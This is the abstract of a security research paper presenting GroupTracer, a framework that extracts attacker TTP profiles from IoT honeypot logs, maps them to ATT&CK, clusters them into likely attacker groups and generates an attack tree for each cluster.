GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things

Abstract EN

As Advanced Persistent Threat (APT) becomes increasingly frequent around the world, security experts are starting to look at how to observe, predict, and mitigate the damage from APT attacks.

In the meantime, the Internet of things devices are also risky and heavily exposed to the Internet, making them more easily used by hacker organizations to launch APT attacks.

An excellent attacker can take down millions of Internet of things devices in a short time.

Once the IoT botnet is built, attackers can use it to launch complex attacks which could damage Internet infrastructure and cause network disconnection.

This paper proposes GroupTracer, a framework for observing and predicting the Internet of things attacks.

GroupTracer is designed to automatically extract the TTP profiles (i.e., tactics, techniques, and procedures) that can describe the behavior of attackers through their tactics, techniques, and processes and dig out the potential attacker groups behind complex attacks.

Firstly, it captures attacks by IoT honeypots and extracts relevant fields from logs.

Then, attack behaviors are automatically mapped to the ATT&CK framework to achieve automatic TTP profiles extraction.

After that, GroupTracer presents four feature groups, including TTP profiles, Time, IP, and URL features, a total of 18 features, mines potential attack groups through hierarchical clustering algorithm, and compares the clustering results with two baseline algorithms.

As the ground truth labels are unknown, we apply three internal validation indexes to evaluate the cluster quantity.

Experimental results showed that the proposed framework has achieved an excellent performance in exploiting potential groups as the Calinski–Harabasz index reaches 3416.93.

Eventually, attack trees are generated for each cluster where nodes indicate attack commands and edges represent command sequences.

These attack trees could help better understand each attack group’s actions and techniques.